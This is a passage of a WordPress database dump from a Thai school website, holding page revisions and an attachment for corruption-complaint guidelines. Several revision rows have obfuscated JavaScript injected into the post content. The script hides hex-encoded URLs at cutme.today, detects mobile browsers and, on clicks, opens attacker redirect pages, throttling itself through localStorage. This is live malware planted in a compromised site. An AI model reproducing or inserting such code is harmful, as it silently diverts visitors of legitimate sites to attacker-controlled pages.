_0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-06-27 11:59:49','2025-06-27 04:59:49','',14,'http://pakhaeng.ssk.in.th/?p=1488',0,'revision','',0),
(1489,1,'2025-06-27 13:40:21','2025-06-27 06:40:21','','แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','','closed','','%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b7-2','','','2025-06-27 13:40:21','2025-06-27 06:40:21','',712,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf',0,'attachment','application/pdf',0),
(1490,1,'2025-06-27 13:40:29','2025-06-27 06:40:29','<!-- wp:file {\"id\":1489,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ\"></object><a id=\"wp-block-file--media-56a02cbf-57f4-4c08-af84-dbe18e44683a\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-56a02cbf-57f4-4c08-af84-dbe18e44683a\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','712-revision-v1','','','2025-06-27 13:40:29','2025-06-27 06:40:29','',712,'http://pakhaeng.ssk.in.th/?p=1490',0,'revision','',0),
(1491,1,'2025-06-27 13:45:00','2025-06-27 06:45:00','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image 